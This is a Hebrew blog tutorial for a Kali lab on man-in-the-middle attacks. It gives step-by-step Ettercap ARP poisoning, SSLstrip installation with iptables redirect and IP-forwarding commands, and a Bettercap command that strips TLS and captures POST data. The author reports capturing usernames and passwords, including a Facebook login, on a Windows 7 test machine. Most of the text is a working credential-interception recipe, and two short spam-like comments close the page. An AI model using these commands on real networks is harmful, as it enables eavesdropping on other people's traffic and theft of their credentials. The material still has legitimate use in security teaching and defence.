כל הזכויות שמורות לטל בן שושן – Shushan.co.il
ביצוע MITM בעזרת Ettercap – הפשטת SSL והאזנה לרשת
על מנת לבצע את המאמר, יש לעבור תחילה על המאמרים הבאים:
Kali & Metasploit
התקנת Kali 2017.3
הגדרה ראשונית של Kali והוספת Repository
הסבר הגדרה והפעלת Metasploit
פקודות ושימוש ב Metasploit
במאמר זה נשתמש 3 כלים:
Ettercap – יבצע את ה MITM, הוא יחליף את כתובת ה MAC של הDefault Gateway במטרה שלנו
גם Ettercap מבצע Sniffing אבל לא תמיד עובד…
SSLstrip – כלי להפשטת ה SSL (יותר נכון הTLS) מאתרי אינטרנט שהמטרה נכנסת אליהם.
EtterCap
ניגש ל Application -> Sniffing And Spoofing – > Ettercap
נוריד את הסימון של Sniffing at startup ונלחץ על הV
נלחץ על החיפוש בצד שמאל ואז על כפתור ה Hosts שלידו
לאחר מכן נלחץ על Add To target 1
כעת נלחץ על כפתור MITM Option ואז ARP Poisoning
כעת נלחץ על כפתור הPlay שבצד הכי שמאלי
כעת נוכל להבחין שכתובת ה MAC Address של קאלי ושל הDefault Gateway הוא זהה
הפקודה בCMD היא
arp -a
כעת אתחבר לאתר http ואנסה להתחבר עם שם משתמש וסיסמא
נוכל להבחין שEttercap “תפס” את המידע כולל שם המשתמש והסיסמא וכתובת האתר
SSLStrip
על מנת להתקין ב Kali 2020 את SSLstrip נתקין תחילה PIP
sudo apt install python-pip -y
כעת נתקין את SSLstrip (דרישות)
sudo git clone https://github.com/robertpro/sslstrip
sudo cd sslstrip
sudo pip install -r requirements.txt
כעת נתקין את SSLstrip
git clone https://github.com/moxie0/sslstrip.git cd sslstrip python setup.py build && python setup.py install
נגדיר Redirect מפורט 80 ל 7777
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 7777
נגדיר שמותר לבצע Ip Forward
echo "1" > /proc/sys/net/ipv4/ip_forward
כעת נפעיל את SSLstrip
sslstrip -l 7777
כעת נכנסתי לגוגל ובחרתי אתר להתחברות למייל (דיי רנדומלי)
לאחר שהתחברתי הועברתי מhttps ל http
וניתן להבחין שEttercap תפרס את השם משתמש והסיסמא
Bettercap – זו גרסה ישנה של Bettercap ולכן תאלצו להוריד את הגרסה הזו על מנת לבצע מדריך זה
כמו שהסברתי למעלה, השימוש מעולה מעולה עקב כך שהוא מבצע Sniffing וגם SSLstrip ובכך מקל על איסוף המידע
*בדקו מעבדה זו על Windows 7
נתקין את החבילות
sudo apt-get install build-essential ruby-dev libpcap-dev
נוריד Bettercap
apt–get update
apt–get install bettercap
נתקין על ידי Gem
gem install bettercap
נבצע עדכון
gem update bettercap
בסיום נקיש
bettercap -T 192.168.31.150 --proxy -P POST
פקודה זו אומרת שהכתובת אותה אנו רוצים לבצע Sniffing וגם SSLstrip, ולקבל את המידע שמוקש בדפדפן רק בתגית Post ובכך יכוון לסיסמאות ושמות משתמשים
נכנס כעת ב 192.168.1.150 במחשב Windows 7 לפייסבוק, נראה כי הוא שונה
הסיבה היא SSLstrip שהפשיט את ה SSL מהאתר
נקיש סתם משתמש וסיסמא
וב Bettercap נוכל להבחין בשם משתמש והסיסמא שהוקש
2 comments
דו האסט א שיינע ארטיקל. איך גלייך עס.
איך טאַקע ליב דיין פּערספּעקטיוו. גוטע ארבעט!